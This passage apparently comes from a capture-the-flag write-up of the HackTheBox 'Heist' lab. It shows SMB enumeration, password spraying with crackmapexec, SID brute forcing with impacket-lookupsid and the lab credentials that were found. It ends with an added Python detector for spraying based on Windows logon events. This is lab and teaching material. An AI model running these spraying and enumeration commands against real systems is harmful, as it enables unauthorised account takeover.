SMB
Nmap revealed an SMB server listening on port 445 of the target.
smbclient
┌──(kali㉿kali)-[~/archive/htb/labs/heist]
└─$ smbclient -L //$IP/
Password for [WORKGROUP\kali]:
session setup failed: NT_STATUS_ACCESS_DENIED
Anonymous Login is not allowed.
crackmapexec
┌──(kali㉿kali)-[~/archive/htb/labs/heist]
└─$ crackmapexec smb $IP -u users -p passwd --continue-on-success
smb 10.10.10.149 445 supportdesk [*] windows 10.0 build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
smb 10.10.10.149 445 supportdesk [+] supportdesk\hazard:stealth1agent
smb 10.10.10.149 445 supportdesk [-] supportdesk\hazard:$uperP@ssword STATUS_LOGON_FAILURE
smb 10.10.10.149 445 supportdesk [-] supportdesk\hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
smb 10.10.10.149 445 supportdesk [-] supportdesk\support:stealth1agent STATUS_LOGON_FAILURE
smb 10.10.10.149 445 supportdesk [-] supportdesk\support:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
smb 10.10.10.149 445 supportdesk [-] supportdesk\support:$uperP@ssword STATUS_LOGON_FAILURE
smb 10.10.10.149 445 supportdesk [-] supportdesk\rout3r:stealth1agent STATUS_LOGON_FAILURE
smb 10.10.10.149 445 supportdesk [-] supportdesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE
smb 10.10.10.149 445 supportdesk [-] supportdesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
smb 10.10.10.149 445 supportdesk [-] supportdesk\admin:stealth1agent STATUS_LOGON_FAILURE
smb 10.10.10.149 445 supportdesk [-] supportdesk\admin:$uperP@ssword STATUS_LOGON_FAILURE
smb 10.10.10.149 445 supportdesk [-] supportdesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
I got one hit: supportdesk\hazard:stealth1agent
This is a valid system credential.
I can also see that supportdesk is the hostname of the target system.
smbmap
┌──(kali㉿kali)-[~/archive/htb/labs/heist]
└─$ smbmap -H $IP -u 'hazard' -p 'stealth1agent'
[+] IP: 10.10.10.149:445 Name: 10.10.10.149
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
I am able to sign in to the target SMB server.
There are only the default SMB shares.
The hazard user has READ-ONLY access to the IPC$ share.
impacket-lookupsid
impacket-lookupsid is an excellent tool to enumerate users via the IPC$ share on the SMB server.
Some believe that this tool is only for Active Directory, but that is not true, as it only requires read access to the IPC$ share.
The only downside is that it generates a lot of noise in the network traffic.
┌──(kali㉿kali)-[~/archive/htb/labs/heist]
└─$ impacket-lookupsid hazard:stealth1agent@$IP -target-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Brute forcing SIDs at 10.10.10.149
[*] stringbinding ncacn_np:10.10.10.149[\pipe\lsarpc]
[*] domain sid is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
I was able to enumerate 2 additional users:
Chase
Jason
crackmapexec
Since I just got 2 additional valid system users, I have to test out the passwords against them.
┌──(kali㉿kali)-[~/archive/htb/labs/heist]
└─$ crackmapexec smb $IP -u users -p passwd --continue-on-success
SMB 10.10.10.149 445 SUPPORTDESK [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\administrator:stealth1agent STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\administrator:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\administrator:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [+] SupportDesk\Hazard:stealth1agent
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\Hazard:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\support:stealth1agent STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\support:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\support:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\Chase:stealth1agent STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\Chase:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\Jason:stealth1agent STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\Jason:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\Jason:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\rout3r:stealth1agent STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\admin:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
A new system credential is validated: SupportDesk\Chase:Q4)sJu\Y8qz*A3?d
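On the defending side, the crackmapexec runs above show up as a burst of failed logons (Security event 4625) from one source against many accounts, with a few successes (4624) in between. The following is an added example, not part of the original writeup, that flags that pattern; the event records, the source addresses and the thresholds are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not from the page). 4625 = failed logon, 4624 = success.
def _ev(sec, eid, user, ip):
    return {"time": datetime(2024, 1, 1, 12, 0, 0) + timedelta(seconds=sec),
            "id": eid, "user": user.lower(), "ip": ip}

SAMPLE = [
    _ev(0, 4625, "administrator", "10.10.14.5"),
    _ev(1, 4624, "Hazard", "10.10.14.5"),
    _ev(2, 4625, "support", "10.10.14.5"),
    _ev(3, 4625, "Chase", "10.10.14.5"),
    _ev(4, 4625, "Chase", "10.10.14.5"),
    _ev(5, 4624, "Chase", "10.10.14.5"),
    _ev(6, 4625, "Jason", "10.10.14.5"),
    _ev(7, 4625, "rout3r", "10.10.14.5"),
    _ev(8, 4625, "admin", "10.10.14.5"),
    # One user mistyping their own password: a single account, must not alert.
    _ev(10, 4625, "jason", "192.168.1.20"),
    _ev(40, 4625, "jason", "192.168.1.20"),
    _ev(70, 4624, "jason", "192.168.1.20"),
]

def detect_spray(events, window=timedelta(minutes=5), min_users=4):
    """Flag sources whose failed logons hit >= min_users distinct accounts in a window."""
    by_ip = defaultdict(list)
    for e in sorted(events, key=lambda e: e["time"]):
        by_ip[e["ip"]].append(e)
    alerts = []
    for ip, evs in by_ip.items():
        fails = [e for e in evs if e["id"] == 4625]
        start = 0
        for end in range(len(fails)):
            # Slide the window so it never spans more than `window` of time.
            while fails[end]["time"] - fails[start]["time"] > window:
                start += 1
            users = {f["user"] for f in fails[start:end + 1]}
            if len(users) >= min_users:
                t0 = fails[start]["time"]
                # Successes from the same source in the window: treat as compromised.
                hits = sorted({e["user"] for e in evs if e["id"] == 4624
                               and t0 <= e["time"] <= t0 + window})
                alerts.append({"ip": ip, "targeted": sorted(users), "compromised": hits})
                break
    return alerts
```

Accounts listed under `compromised` are the ones whose passwords should be reset first, since a success in the middle of a spray means the guessed password was correct.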